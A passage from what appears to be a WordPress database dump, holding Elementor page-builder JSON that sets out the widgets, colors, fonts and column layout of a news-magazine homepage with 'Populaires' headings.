"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1sdsi6e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"dhtcvad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"szy1sdj\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"c999aha\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d8tqobd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1355,476,'_elementor_version','0.4'),(1356,477,'_elementor_edit_mode','builder'),(1357,477,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1sdsi6e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"dhtcvad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"c999aha\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"d8tqobd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"szy1sdj\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(1358,477,'_elementor_version','0.4'),(1360,478,'_elementor_edit_mode','builder'),(1361,478,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"verti